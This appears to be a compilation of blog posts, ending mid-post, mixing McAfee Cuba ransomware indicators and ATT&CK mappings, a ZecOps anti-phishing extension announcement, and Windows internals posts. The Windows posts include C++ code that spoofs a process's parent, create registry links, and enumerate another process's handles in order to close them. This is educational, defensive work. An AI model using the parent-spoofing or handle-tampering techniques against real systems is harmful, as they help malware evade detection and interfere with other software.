As a threat intel analyst or hunter, you might want to quickly scan your systems for any indicators you received on Cuba ransomware. Of course, you can do that manually by downloading a list of indicators and searching with available tools. However, if you have MVISION EDR and Insights, you can do that right from the console, saving precious time. Hunting the attacker can be a game of inches so every second counts. Of course, if you found infected systems or systems with indicators, you can take action to contain and start an investigation for incident response immediately from the MVISION EDR console.

In addition to these IOCs, YARA rules are available in our technical analysis of Cuba ransomware.

IOCs:

Files:

151.bat

151.ps1

Kurva.ps1

 

Email addresses:

under_amur@protonmail[.]ch

helpadmin2@cock[.]li

helpadmin2@protonmail[.]com

iracomp2@protonmail[.]ch

[email protected]

[email protected]

[email protected]

 

Domain:

kurvalarva[.]com

 

Script for lateral movement and deployment:

54627975c0befee0075d6da1a53af9403f047d9e367389e48ae0d25c2a7154bc

c385ef710cbdd8ba7759e084051f5742b6fa8a6b65340a9795f48d0a425fec61

40101fb3629cdb7d53c3af19dea2b6245a8d8aa9f28febd052bb9d792cfbefa6

 

Cuba Ransomware:

c4b1f4e1ac9a28cc9e50195b29dde8bd54527abc7f4d16899f9f8315c852afd4

944ee8789cc929d2efda5790669e5266fe80910cabf1050cbb3e57dc62de2040
78ce13d09d828fc8b06cf55f8247bac07379d0c8b8c8b1a6996c29163fa4b659
33352a38454cfc247bc7465bf177f5f97d7fd0bd220103d4422c8ec45b4d3d0e

672fb249e520f4496e72021f887f8bb86fec5604317d8af3f0800d49aa157be1
e942a8bcb3d4a6f6df6a6522e4d5c58d25cdbe369ecda1356a66dacbd3945d30

907f42a79192a016154f11927fbb1e6f661f679d68947bddc714f5acc4aa66eb
28140885cf794ffef27f5673ca64bd680fc0b8a469453d0310aea439f7e04e64
271ef3c1d022829f0b15f2471d05a28d4786abafd0a9e1e742bde3f6b36872ad
6396ea2ef48aa3d3a61fb2e1ca50ac3711c376ec2b67dbaf64eeba49f5dfa9df

bda4bddcbd140e4012bab453e28a4fba86f16ac8983d7db391043eab627e9fa1

7a17f344d916f7f0272b9480336fb05d33147b8be2e71c3261ea30a32d73fecb

c206593d626e1f8b9c5d15b9b5ec16a298890e8bae61a232c2104cbac8d51bdd

9882c2f5a95d7680626470f6c0d3609c7590eb552065f81ab41ffe074ea74e82

c385ef710cbdd8ba7759e084051f5742b6fa8a6b65340a9795f48d0a425fec61
54627975c0befee0075d6da1a53af9403f047d9e367389e48ae0d25c2a7154bc
1f825ef9ff3e0bb80b7076ef19b837e927efea9db123d3b2b8ec15c8510da647
40101fb3629cdb7d53c3af19dea2b6245a8d8aa9f28febd052bb9d792cfbefa6

00ddbe28a31cc91bd7b1989a9bebd43c4b5565aa0a9ed4e0ca2a5cfb290475ed

729950ce621a4bc6579957eabb3d1668498c805738ee5e83b74d5edaf2f4cb9e

 

MITRE ATT&CK Techniques:

Tactic Technique Observable IOCs
Execution Command and Scripting Interpreter: PowerShell (T1059.001) Cuba team is using PowerShell payload to drop Cuba ransomware f739977004981fbe4a54bc68be18ea79

68a99624f98b8cd956108fedcc44e07c

bdeb5acc7b569c783f81499f400b2745

 

Execution System Services: Service Execution (T1569.002)  

 

Execution Shared Modules (T1129) Cuba ransomware links function at runtime Functions:

“GetModuleHandle”

“GetProcAddress”

“GetModuleHandleEx”

Execution Command and Scripting Interpreter (T1059) Cuba ransomware accepts command line arguments Functions:

“GetCommandLine”

Persistence Create or Modify System Process: Windows Service (T1543.003) Cuba ransomware can modify services Functions:

“OpenService”

“ChangeServiceConfig”

Privilege Escalation Access Token Manipulation (T1134) Cuba ransomware can adjust access privileges Functions:

“SeDebugPrivilege”

“AdjustTokenPrivileges”

“LookupPrivilegeValue”

Defense Evasion File and Directory Permissions Modification (T1222) Cuba ransomware will set file attributes Functions:

“SetFileAttributes”

Defense Evasion Obfuscated files or Information (T1027) Cuba ransomware is using xor algorithm to encode data
Defense Evasion Virtualization/Sandbox Evasion: System Checks Cuba ransomware executes anti-vm instructions
Discovery File and Directory Discovery (T1083) Cuba ransomware enumerates files Functions:

“FindFirstFile”

“FindNextFile”

“FindClose”

“FindFirstFileEx”

“FindNextFileEx”

“GetFileSizeEx”

Discovery Process Discovery (T1057) Cuba ransomware enumerates process modules Functions:

“K32EnumProcesses”

Discovery System Information Discovery (T1082) Cuba ransomware can get keyboard layout, enumerates disks, etc Functions:

“GetKeyboardLayoutList”

“FindFirstVolume”

“FindNextVolume”

“GetVolumePathNamesForVolumeName”

“GetDriveType”

“GetLogicalDriveStrings”

“GetDiskFreeSpaceEx”

Discovery System Service Discovery (T1007) Cuba ransomware can query service status Functions:

“QueryServiceStatusEx”

Collection Input Capture: Keylogging (T1056.001) Cuba ransomware logs keystrokes via polling Functions:

“GetKeyState”

“VkKeyScan”

Impact Service Stop (T1489) Cuba ransomware can stop services
Impact Data encrypted for Impact (T1486) Cuba ransomware encrypts data

 

Proactively Detecting Cuba Ransomware Techniques

Many of the exploit stage techniques in this attack could use legitimate Windows processes and applications to either exploit or avoid detection. We discussed, above, how the Endpoint Protection Platform can disrupt weaponized documents but, by using MVISION EDR, you can get more visibility. As security analysts, we want to focus on suspicious techniques used by Initial Access, as this attack’s Initial Access is unknown.

Monitoring or Reporting on Cuba Ransomware Events

Events from McAfee Endpoint Protection and McAfee MVISION EDR play a key role in Cuba ransomware incident and threat response. McAfee ePO centralizes event collection from all managed endpoint systems. As a threat responder, you may want to create a dashboard for Cuba ransomware-related threat events to understand your current exposure.

Summary

To defeat targeted threat campaigns, defenders must collaborate internally and externally to build an adaptive security architecture which will make it harder for threat actors to succeed and build resilience in the business. This blog highlights how to use McAfee’s security solutions to prevent, detect and respond to Cuba ransomware and attackers using similar techniques.

McAfee ATR is actively monitoring this campaign and will continue to update McAfee Insights and its social networking channels with new and current information. Want to stay ahead of the adversaries? Check out McAfee Insights for more information.

The post McAfee Defender’s Blog: Cuba Ransomware Campaign appeared first on McAfee Blog.

McAfee ATR Threat Report: A Quick Primer on Cuba Ransomware

6 April 2021 at 17:00

Executive Summary 

Cuba ransomware is an older ransomware, that has recently undergone some development. The actors have incorporated the leaking of victim data to increase its impact and revenue, much like we have seen recently with other major ransomware campaigns. 

In our analysis, we observed that the attackers had access to the network before the infection and were able to collect specific information in order to orchestrate the attack and have the greatest impact. The attackers operate using a set of PowerShell scripts that enables them to move laterally. The ransom note mentions that the data was exfiltrated before it was encrypted. In similar attacks we have observed the use of Cobalt Strike payload, although we have not found clear evidence of a relationship with Cuba ransomware. 

We observed Cuba ransomware targeting financial institutions, industry, technology and logistics organizations.  

The following picture shows an overview of the countries that have been impacted according to our telemetry.  

Coverage and Protection Advice 

Defenders should be on the lookout for traces and behaviours that correlate to open source pen test tools such as winPEASLazagne, Bloodhound and Sharp Hound, or hacking frameworks like Cobalt Strike, Metasploit, Empire or Covenant, as well as abnormal behavior of non-malicious tools that have a dual use. These seemingly legitimate tools (e.g., ADfindPSExec, PowerShell, etc.) can be used for things like enumeration and execution. Subsequently, be on the lookout for abnormal usage of Windows Management Instrumentation WMIC (T1047). We advise everyone to check out the following blogs on evidence indicators for a targeted ransomware attack (Part1Part2).  

Looking at other similar Ransomware-as-a-Service families we have seen that certain entry vectors are quite common among ransomware criminals: 

  • E-mail Spear phishing (T1566.001) often used to directly engage and/or gain an initial foothold. The initial phishing email can also be linked to a different malware strain, which acts as a loader and entry point for the attackers to continue completely compromising a victim’s network. We have observed this in the past with the likes of Trickbot & Ryuk or Qakbot & Prolock, etc.  
  • Exploit Public-Facing Application (T1190) is another common entry vector, given cyber criminals are often avid consumers of security news and are always on the lookout for a good exploit. We therefore encourage organizations to be fast and diligent when it comes to applying patches. There are numerous examples in the past where vulnerabilities concerning remote access software, webservers, network edge equipment and firewalls have been used as an entry point.  
  • Using valid accounts (T1078) is and has been a proven method for cybercriminals to gain a foothold. After all, why break the door down if you already have the keys? Weakly protected RDP access is a prime example of this entry method. For the best tips on RDP security, please see our blog explaining RDP security. 
  • Valid accounts can also be obtained via commodity malware such as infostealers that are designed to steal credentials from a victim’s computer. Infostealer logs containing thousands of credentials can be purchased by ransomware criminals to search for VPN and corporate logins. For organizations, having a robust credential management and MFA on user accounts is an absolute must have.  

When it comes to the actual ransomware binary, we strongly advise updating and upgrading endpoint protection, as well as enabling options like tamper protection and Rollback. Please read our blog on how to best configure ENS 10.7 to protect against ransomware for more details. 

For active protection, more details can be found on our website –  https://www.mcafee.com/enterprise/en-us/threat-center/threat-landscape-dashboard/ransomware-details.cuba-ransomware.html – and in our detailed Defender blog. 

Summary of the Threat 

  • Cuba ransomware is currently hitting several companies in north and south America, as well as in Europe.  
  • The attackers use a set of obfuscated PowerShell scripts to move laterally and deploy their attack.  
  • The website to leak the stolen data has been put online recently.  
  • The malware is obfuscated and comes with several evasion techniques.  
  • The actors have sold some of the stolen data 
  • The ransomware uses multiple argument options and has the possibility to discover shared resources using the NetShareEnum API. 

Learn more about Cuba ransomware, Yara Rules, Indicators of Compromise & Mitre ATT&CK techniques used by reading our detailed technical analysis.

The post McAfee ATR Threat Report: A Quick Primer on Cuba Ransomware appeared first on McAfee Blog.

Introducing ZecOps Anti-Phishing Extension

8 April 2021 at 10:10
Introducing ZecOps Anti-Phishing Extension

Phishing is a common social engineering attack that is used by scammers to steal personal information, including authentication credentials and credit card numbers. Being well known for more than 30 years, phishing is still the most common attack performed by cyber-criminals. There have been several attempts at combating phishing attacks, but no attempt has been able to successfully eliminate the problem.

One of the most common attack scenarios involves the attacker sending an email or a text message to the victim. The message, pretending to be from a trustworthy entity, links to a fake website which visually matches a legitimate site. Nowadays, most browsers include limited protection to phishing, relying on a list of known phishing domains. While such protection has value, it’s still easy to bypass.

To help combat phishing attacks, we developed a browser extension that takes a different approach. Instead of trying to determine whether a visited website is a fake website used for phishing, we augment the website with additional visual information, allowing the user to make an informed decision. The user can take into account context that the browser has no way of knowing, such as the origin of the link and the sensitivity of the information about to be entered.

The website identity

One of the most common types of phishing is tricking the user into entering credentials into a fake website. The traditional way of avoiding such phishing is to check the address bar and verify that the address matches the expected, legitimate website. Such a check requires some discipline, and is easy to miss amid a busy day.

The main goal of ZecOps Anti-Phishing Extension is to make it easy to determine the identity of a website, having a visual indication that is difficult to miss.

Take a look at the following example:

Visiting a phishing website without and with the extension
Visiting a phishing website without and with the extension

In this example, the victim navigated to a fake website pretending to be paypal.com. Without the extension (left part of the image), the only difference compared to the real website is a single character in the address bar (1 instead of l in “paypal”). With the extension, the victim gets critical information just before entering his credentials:

  • The website is visited for the first time. For a website such as PayPal, which the victim probably visited multiple times before, this is a red flag.
  • The domain name is very similar to another, well known domain name. In this case, the extension is able to recognize that “paypa1.com” is visually similar to “paypal.com”, making the phishing attempt obvious.
  • The elephant image is the visual identity of the website that the extension generated for paypa1.com, which is most likely to be different from the visual identity of paypal.com. If the victim signs into paypal.com often, he might notice that the image changed and that something is wrong. Users won’t be able to remember all images for all websites, but that’s another measure of caution that can prevent a successful attack, and is more effective for websites that are visited more often.

Misleading links

Another common phishing technique involves sending a message with a link that looks legit, but leads to a different website that is controlled by the attacker. ZecOps Anti-Phishing Extension detects such links and displays a warning message:

A warning about a misleading link
A warning about a misleading link

A word about privacy

We care about our users’ privacy, and so the extension doesn’t send any information back to us. We don’t collect the websites you visit, the messages you see, or anything at all. The only data we collect is through our phishing reporting form that you can voluntarily submit.

Installing the extension

You can get the extension in the extension store for your browser:

Source code

The source code of the extension can be found on GitHub:
ZecOps/anti-phishing-extension

Other ZecOps Projects

We created this project as a community project. If you’d like to learn about the other initiatives we have at ZecOps, we invite you to learn more about ZecOps Mobile EDR / DFIR solutions here.

Next Public Windows Internals training

17 March 2021 at 16:04

I am announcing the next Windows Internals remote training to be held in July 2021 on the 12, 14, 15, 19, 21. Times: 11am to 7pm, London time.

The syllabus can be found here (slight changes are possible if new important topics come up).

Cost and Registration

I’m keeping the cost of these training classes relatively low. This is to make these classes accessible to more people, especially in these unusual and challenging times.

Cost: 800 USD if paid by an individual, 1500 USD if paid by a company. Multiple participants from the same company are entitled to a discount (email me for the details). Previous students of my classes are entitled to a 10% discount.

To register, send an email to [email protected] and specify “Windows Internals Training” in the title. The email should include your name, contact email, and company name (if any).

Later this year I plan a Windows Kernel Programming class. Stay tuned!

As usual, if you have any questions, feel free to send me an email, or DM me on twitter (@zodiacon) or Linkedin (https://www.linkedin.com/in/pavely/).

Platform-Ico-n-Transparent-3-Windows

zodiacon

Parent Process vs. Creator Process

10 January 2021 at 07:51

Normally, a process created by another process in Windows establishes a parent-child relationship between them. This relationship can be viewed in tools such as Process Explorer. Here is an example showing FoxitReader as a child process of Explorer, implying Explorer created FoxitReader. That must be the case, right?

First, it’s important to emphasize that there is no dependency between a child and a parent process in any way. For example, if the parent process terminates, the child is unaffected. The parent is used for inheriting many properties of the child process, such as current directory and environment variables (if not specified explicitly).

Windows stores the parent process ID in the process management object of the child in the kernel for posterity. This also means that the process ID, although correct, could point to a “wrong” process. This can happen if the parent dies, and the process ID is reused.

Process Explorer does not get confused in such a case, and left-justifies the process in its tree view. It knows to check the process creation time. If the “parent” was created after the child, there is no way it could be the real parent. The parent process ID can still be viewed in the process properties:

Notice the “<Non-existent Parent>” indication. Although the parent process ID is known (13636 in this case), there is no other information on that process, as it does not exist anymore, and its ID may or may not have been reused.

By the way, don’t be alarmed that Explorer has no living parent. This is expected, as it’s normally created by a process running the image UserInit.exe, that exits normally after finishing its duties.

Returning to the question raised earlier – is the parent process always the actual creator? Not necessarily.

The canonical example is when a process is launched elevated (for example, by right-clicking it in Explorer and selecting “Run as Administrator”. Here is a diagram showing the major components in an elevation procedure:

First, the user right-clicks in Explorer and asks to run some App.Exe elevated. Explorer calls ShellExecute(Ex) with the verb “runas” that requests this elevation. Next, The AppInfo service is contacted to perform the operation if possible. It launches consent.exe, which shows the Yes/No message box (for true administrators) or a username/password dialog to get an admin’s approval for the elevation. Assuming this is granted, the AppInfo service calls CreateProcessAsUser to launch the App.exe elevated. To maintain the illusion that Explorer created App.exe, it stores the parent ID of Explorer into App.exe‘s new process management block. This makes it look as if Explorer had created App.exe, but is not really what happened. However, that “re-parenting” is probably a good idea in this case, giving the user the expected result.

Is it possible to specify a different parent when creating a process with CreateProcess?

It is indeed possible by using a process attribute. Here is a function that does just that (with minimal error handling):

bool CreateProcessWithParent(DWORD parentId, PWSTR commandline) {
    auto hProcess = ::OpenProcess(PROCESS_CREATE_PROCESS, FALSE, parentId);
    if (!hProcess)
        return false;

    SIZE_T size;
    //
    // call InitializeProcThreadAttributeList twice
    // first, get required size
    //
    ::InitializeProcThreadAttributeList(nullptr, 1, 0, &size);

    //
    // now allocate a buffer with the required size and call again
    //
    auto buffer = std::make_unique<BYTE[]>(size);
    auto attributes = reinterpret_cast<PPROC_THREAD_ATTRIBUTE_LIST>(buffer.get());
    ::InitializeProcThreadAttributeList(attributes, 1, 0, &size);

    //
    // add the parent attribute
    //
    ::UpdateProcThreadAttribute(attributes, 0, 
        PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, 
        &hProcess, sizeof(hProcess), nullptr, nullptr);

    STARTUPINFOEX si = { sizeof(si) };
    //
    // set the attribute list
    //
    si.lpAttributeList = attributes;
    PROCESS_INFORMATION pi;

    //
    // create the process
    //
    BOOL created = ::CreateProcess(nullptr, commandline, nullptr, nullptr, 
        FALSE, EXTENDED_STARTUPINFO_PRESENT, nullptr, nullptr, 
        (STARTUPINFO*)&si, &pi);

    //
    // cleanup
    //
    ::CloseHandle(hProcess);
    ::DeleteProcThreadAttributeList(attributes);

    return created;
}

The first step is to open a handle to the “prospected” parent by calling OpenProcess with the PROCESS_CREATE_PROCESS access mask. This means you cannot choose an arbitrary process, you must have at least that access to the process. Protected (and protected light) processes, for example, cannot be used as parents in this way, as PROCESS_CREATE_PROCESS cannot be obtained for such processes.

Next, an attribute list is created with a single attribute of type PROC_THREAD_ATTRIBUTE_PARENT_PROCESS by calling InitializeProcThreadAttributeList followed by UpdateProcThreadAttribute to set up the parent handle. Finally, CreateProcess is called with the extended STARTUPINFOEX structure where the attribute list is stored. CreateProcess must know about the extended version by specifying EXTENDED_STARTUPINFO_PRESENT in its flags argument.

Here is an example where Excel supposedly created Notepad (it really didn’t). The “real” process creator is nowhere to be found.

The obvious question perhaps is whether there is any way to know which process was the real creator?

The only way that seems to be available is for kernel drivers that register for process creation notifications with PsSetCreateProcessNotifyRoutineEx (or one of its variants). When such a notification is invoked in the driver, the following structure is provided:

typedef struct _PS_CREATE_NOTIFY_INFO {
  SIZE_T              Size;
  union {
    ULONG Flags;
    struct {
      ULONG FileOpenNameAvailable : 1;
      ULONG IsSubsystemProcess : 1;
      ULONG Reserved : 30;
    };
  };
  HANDLE              ParentProcessId;
  CLIENT_ID           CreatingThreadId;
  struct _FILE_OBJECT *FileObject;
  PCUNICODE_STRING    ImageFileName;
  PCUNICODE_STRING    CommandLine;
  NTSTATUS            CreationStatus;
} PS_CREATE_NOTIFY_INFO, *PPS_CREATE_NOTIFY_INFO;

On the one hand, there is the ParentProcessId member (although it’s typed as HANDLE, it actually the parent process ID). This is the parent process as set by CreateProcess based on the code snippet in CreateProcessWithParent.

However, there is also the CreatingThreadId member of type CLIENT_ID, which is a small structure containing a process and thread IDs. This is the real creator. In most cases it’s going to have the same process ID as ParentProcessId, but not in the case where a different parent has been specified.

After this point, that information goes away, leaving only the parent ID, as it’s the one stored in the EPROCESS kernel structure of the child process.

Update: (thanks to @jdu2600)

The creator is available by listening to the process create ETW event, where the creator is the one raising the event. Here is a snapshot from my own ProcMonXv2:

runelevated-1

zodiacon

Next Public (Remote) Training Classes

29 October 2020 at 20:44

I am announcing the next Windows Internals remote training to be held in January 2021 on the 19, 21, 25, 27, 28. Times: 11am to 7pm, London time.

The syllabus can be found here.

I am also announcing a new training, requested by quite a few people, Windows System Programming. The dates are in February 2021: 8, 9, 11, 15, 17. Times: 12pm to 8pm, London time.

The syllabus can be found here.

Cost and Registration

I’m keeping the cost of these training classes relatively low. This is to make these classes accessible to more people, especially in these challenging times. If you register for both classes, you get 10% off the second class. Previous students of my classes get 10% off as well.

Cost: 750 USD if paid by an individual, 1500 USD if paid by a company. Multiple participants from the same company are entitled to a discount (email me for the details).

To register, send an email to [email protected] and specify “Training” in the title. The email should include the training(s) you’re interested in, your name, contact email, company name (if any) and preferred time zone. The training times have already been selected, but it’s still good to know which time zone you live in.

As usual, if you have any questions, feel free to shoot me an email, or DM me on twitter (@zodiacon) or Linkedin (https://www.linkedin.com/in/pavely/).

Platform-Ico-n-Transparent-3-Windows

zodiacon

Upcoming Public Remote Training

24 July 2020 at 14:49

I have recently completed another successful iteration of the Windows Internals training – thank you those who participated!

I am announcing two upcoming training classes, Windows Internals and Windows Kernel Programming.

Windows Internals (5 days)

I promised some folks that the next Internals training would be convenient to US-based time zones. That said, all time zones are welcome!

Dates: Sep 29, Oct 1, 5, 7, 8
Times: 8am to 4pm Pacific time (11am to 7pm Eastern)

The syllabus can be found here. I may make small changes in the final topics, but the major topics remain the same.

Windows Kernel Programming (4 days)

Dates: Oct 13, 15, 19, 21
Times: TBA

The syllabus can be found here. Again, slight changes are possible. This is a development-heavy course, so be prepared to write lots of code!

The selected time zone will be based on the majority of participants’ preference.

Cost and Registration

The cost for each class is kept relatively low (as opposed to other, perhaps similar offerings), as I’ve done in the past year or so. This is to make these classes accessible to more people, especially in these challenging times. If you register for both classes, you get 10% off the second class. Previous students of my classes get 10% off as well.

Cost: 750 USD if paid by an individual, 1500 USD if paid by a company. Multiple participants from the same company are entitled to a discount (email me for the details).

To register, send an email to [email protected] and specify “Training” in the title. The email should include your name, company name (if any) and preferred time zone.

Please read carefully the pre-requisites of each class, especially for Windows Kernel Programming. In case of doubt, talk to me.

If you have any questions, feel free to shoot me an email, or DM me on twitter (@zodiacon) or Linkedin (https://www.linkedin.com/in/pavely/).

For Companies

Companies that are interested in such (or other) training classes receive special prices. Topics can also be customized according to specific needs.

Other classes I provide include: Modern C++ Programming, Windows System Programming, COM Programming, C#/.NET Programming (Basic and Advanced), Advanced Windows Debugging, and more. Contact me for detailed syllabi if interested.

Platform-Ico-n-Transparent-3-Windows

zodiacon

Creating Registry Links

17 July 2020 at 18:55

The standard Windows Registry contains some keys that are not real keys, but instead are symbolic links (or simply, links) to other keys. For example, the key HKEY_LOCAL_MACHINE\System\CurrentControlSet is a symbolic link to HKEY_LOCAL_MACHINE\System\ControlSet001 (in most cases). When working with the standard Registry editor, RegEdit.exe, symbolic links look like normal keys, in the sense that they behave as the link’s target. The following figure shows the above mentioned keys. They look exactly the same (and they are).

There are several other existing links in the Registry. As another example, the hive HKEY_CURRENT_CONFIG is a link to (HKLM is HKEY_LOCAL_MACHINE) HKLM\SYSTEM\CurrentControlSet\Hardware Profiles\Current.

But how to do you create such links yourself? The official Microsoft documentation has partial details on how to do it, and it misses two critical pieces of information to make it work.

Let’s see if we can create a symbolic link. One rule of Registry links, is that the link must point to somewhere within the same hive where the link is created; we can live with that. For demonstration purposes, we’ll create a link in HKEY_CURRENT_USER named DesktopColors that links to HKEY_CURRENT_USER\Control Panel\Desktop\Colors.

The first step is to create the key and specify it to be a link rather than a normal key (error handling omitted):

HKEY hKey;
RegCreateKeyEx(HKEY_CURRENT_USER, L"DesktopColors", 0, nullptr,
	REG_OPTION_CREATE_LINK, KEY_WRITE, nullptr, &hKey, nullptr);

The important part is that REG_OPTION_CREATE_LINK flag that indicates this is supposed to be a link rather than a standard key. The KEY_WRITE access mask is required as well, as we are about to set the link’s target.

Now comes the first tricky part. The documentation states that the link’s target should be written to a value named “SymbolicLinkValue” and it must be an absolute registry path. Sounds easy enough, right? Wrong. The issue here is the “absolute path” – you might think that it should be something like “HKEY_CURRENT_USER\Control Panel\Desktop\Colors” just like we want, but hey – maybe it’s supposed to be “HKCU” instead of “HKEY_CURRENT_USER” – it’s just a string after all.

It turns out both these variants are wrong. The “absolute path” required here is a native Registry path that is not visible in RegEdit.exe, but it is visible in my own Registry editing tool, RegEditX.exe, downloadable from https://github.com/zodiacon/AllTools. Here is a screenshot, showing the “real” Registry vs. the view we get with RegEdit.

This top view is the “real” Registry is seen by the Windows kernel. Notice there is no HKEY_CURRENT_USER, there is a USER key where subkeys exist that represent users on this machine based on their SIDs. These are mostly visible in the standard Registry under the HKEY_USERS hive.

The “absolute path” needed is based on the real view of the Registry. Here is the code that writes the correct path based on my (current user’s) SID:

WCHAR path[] = L"\\REGISTRY\\USER\\S-1-5-21-2575492975-396570422-1775383339-1001\\Control Panel\\Desktop\\Colors";
RegSetValueEx(hKey, L"SymbolicLinkValue", 0, REG_LINK, (const BYTE*)path,
    wcslen(path) * sizeof(WCHAR));

The above code shows the second (undocumented, as far as I can tell) piece of crucial information – the length of the link path (in bytes) must NOT include the NULL terminator. Good luck guessing that 🙂

And that’s it. We can safely close the key and we’re done.

Well, almost. If you try to delete your newly created key using RegEdit.exe – the target is deleted, rather than the link key itself! So, how do you delete the key link? (My RegEditX does not support this yet).

The standard RegDeleteKey and RegDeleteKeyEx APIs are unable to delete a link. Even if they’re given a key handle opened with REG_OPTION_OPEN_LINK – they ignore it and go for the target. The only API that works is the native NtDeleteKey function (from NtDll.Dll).

First, we add the function’s declaration and the NtDll import:

extern "C" int NTAPI NtDeleteKey(HKEY);

#pragma comment(lib, "ntdll")

Now we can delete a link key like so:

HKEY hKey;
RegOpenKeyEx(HKEY_CURRENT_USER, L"DesktopColors", REG_OPTION_OPEN_LINK, 
    DELETE, &hKey);
NtDeleteKey(hKey);

As a final note, RegCreateKeyEx cannot open an existing link key – it can only create one. This in contrast to standard keys that can be created OR opened with RegCreateKeyEx. This means that if you want to change an existing link’s target, you have to call RegOpenKeyEx first (with REG_OPTION_OPEN_LINK) and then make the change (or delete the link key and re-create it).

Isn’t Registry fun?

reglink2

zodiacon

How can I close a handle in another process?

15 March 2020 at 18:24

Many of you are probably familiar with Process Explorer‘s ability to close a handle in any process. How can this be accomplished programmatically?

The standard CloseHandle function can close a handle in the current process only, and most of the time that’s a good thing. But what if you need, for whatever reason, to close a handle in another process?

There are two routes than can be taken here. The first one is using a kernel driver. If this is a viable option, then nothing can prevent you from doing the deed. Process Explorer uses that option, since it has a kernel driver (if launched with admin priveleges at least once). In this post, I will focus on user mode options, some of which are applicable to kernel mode as well.

The first issue to consider is how to locate the handle in question, since its value is unknown in advance. There must be some criteria for which you know how to identify the handle once you stumble upon it. The easiest (and probably most common) case is a handle to a named object.

Let take a concrete example, which I believe is now a classic, Windows Media Player. Regardless of what opnions you may have regarding WMP, it still works. One of it quirks, is that it only allows a single instance of itself to run. This is accomplished by the classic technique of creating a named mutex when WMP comes up, and if it turns out the named mutex already exists (presumabley created by an already existing instance of itself), send a message to its other instance and then exits.

The following screenshot shows the handle in question in a running WMP instance.

wmp1

This provides an opportunity to close that mutex’ handle “behind WMP’s back” and then being able to launch another instance. You can try this by manually closing the handle with Process Explorer and then launch another WMP instance successfully.

If we want to achieve this programmatically, we have to locate the handle first. Unfortunately, the documented Windows API does not provide a way to enumerate handles, not even in the current process. We have to go with the (officially undocumented) Native API if we want to enumerate handles. There two routes we can use:

  1. Enumerate all handles in the system with NtQuerySystemInformation, search for the handle in the PID of WMP.
  2. Enumerate all handles in the WMP process only, searching for the handle yet again.
  3. Inject code into the WMP process to query handles one by one, until found.

Option 3 requires code injection, which can be done by using the CreateRemoteThreadEx function, but requires a DLL that we inject. This technique is very well-known, so I won’t repeat it here. It has the advantage of not requring some of the native APIs we’ll be using shortly.

Options 1 and 2 look very similar, and for our purposes, they are. Option 1 retrieves too much information, so it’s probably better to go with option 2.

Let’s start at the beginning: we need to locate the WMP process. Here is a function to do that, using the Toolhelp API for process enumeration:

#include <windows.h>
#include <TlHelp32.h>
#include <stdio.h>

DWORD FindMediaPlayer() {
	HANDLE hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hSnapshot == INVALID_HANDLE_VALUE)
		return 0;

	PROCESSENTRY32 pe;
	pe.dwSize = sizeof(pe);

	// skip the idle process
	::Process32First(hSnapshot, &pe);
	
	DWORD pid = 0;
	while (::Process32Next(hSnapshot, &pe)) {
		if (::_wcsicmp(pe.szExeFile, L"wmplayer.exe") == 0) {
			// found it!
			pid = pe.th32ProcessID;
			break;
		}
	}
	::CloseHandle(hSnapshot);
	return pid;
}


int main() {
	DWORD pid = FindMediaPlayer();
	if (pid == 0) {
		printf("Failed to locate media player\n");
		return 1;
	}
	printf("Located media player: PID=%u\n", pid);
	return 0;
}

Now that we have located WMP, let’s get all handles in that process. The first step is opening a handle to the process with PROCESS_QUERY_INFORMATION and PROCESS_DUP_HANDLE (we’ll see why that’s needed in a little bit):

HANDLE hProcess = ::OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE,
	FALSE, pid);
if (!hProcess) {
	printf("Failed to open WMP process handle (error=%u)\n",
		::GetLastError());
	return 1;
}

If we can’t open a proper handle, then something is terribly wrong. Maybe WMP closed in the meantime?

Now we need to work with the native API to query the handles in the WMP process. We’ll have to bring in some definitions, which you can find in the excellent phnt project on Github (I added extern "C" declaration because we use a C++ file).

#include <memory>

#pragma comment(lib, "ntdll")

#define NT_SUCCESS(status) (status >= 0)

#define STATUS_INFO_LENGTH_MISMATCH      ((NTSTATUS)0xC0000004L)

enum PROCESSINFOCLASS {
	ProcessHandleInformation = 51
};

typedef struct _PROCESS_HANDLE_TABLE_ENTRY_INFO {
	HANDLE HandleValue;
	ULONG_PTR HandleCount;
	ULONG_PTR PointerCount;
	ULONG GrantedAccess;
	ULONG ObjectTypeIndex;
	ULONG HandleAttributes;
	ULONG Reserved;
} PROCESS_HANDLE_TABLE_ENTRY_INFO, * PPROCESS_HANDLE_TABLE_ENTRY_INFO;

// private
typedef struct _PROCESS_HANDLE_SNAPSHOT_INFORMATION {
	ULONG_PTR NumberOfHandles;
	ULONG_PTR Reserved;
	PROCESS_HANDLE_TABLE_ENTRY_INFO Handles[1];
} PROCESS_HANDLE_SNAPSHOT_INFORMATION, * PPROCESS_HANDLE_SNAPSHOT_INFORMATION;

extern "C" NTSTATUS NTAPI NtQueryInformationProcess(
	_In_ HANDLE ProcessHandle,
	_In_ PROCESSINFOCLASS ProcessInformationClass,
	_Out_writes_bytes_(ProcessInformationLength) PVOID ProcessInformation,
	_In_ ULONG ProcessInformationLength,
	_Out_opt_ PULONG ReturnLength);

The #include <memory> is for using unique_ptr<> as we’ll do soon enough. The #parma links the NTDLL import library so that we don’t get an “unresolved external” when calling NtQueryInformationProcess. Some people prefer getting the functions address with GetProcAddress so that linking with the import library is not necessary. I think using GetProcAddress is important when using a function that may not exist on the system it’s running on, otherwise the process will crash at startup, when the loader (code inside NTDLL.dll) tries to locate a function. It does not care if we check dynamically whether to use the function or not – it will crash. Using GetProcAddress will just fail and the code can handle it. In our case, NtQueryInformationProcess existed since the first Windows NT version, so I chose to go with the simplest route.

Our next step is to enumerate the handles with the process information class I plucked from the full list in the phnt project (ntpsapi.h file):

ULONG size = 1 << 10;
std::unique_ptr<BYTE[]> buffer;
for (;;) {
	buffer = std::make_unique<BYTE[]>(size);
	auto status = ::NtQueryInformationProcess(hProcess, ProcessHandleInformation, 
		buffer.get(), size, &size);
	if (NT_SUCCESS(status))
		break;
	if (status == STATUS_INFO_LENGTH_MISMATCH) {
		size += 1 << 10;
		continue;
	}
	printf("Error enumerating handles\n");
	return 1;
}

The Query* style functions in the native API request a buffer and return STATUS_INFO_LENGTH_MISMATCH if it’s not large enough or not of the correct size. The code allocates a buffer with make_unique<BYTE[]> and tries its luck. If the buffer is not large enough, it receives back the required size and then reallocates the buffer before making another call.

Now we need to step through the handles, looking for our mutex. The information returned from each handle does not include the object’s name, which means we have to make yet another native API call, this time to NtQyeryObject along with some extra required definitions:

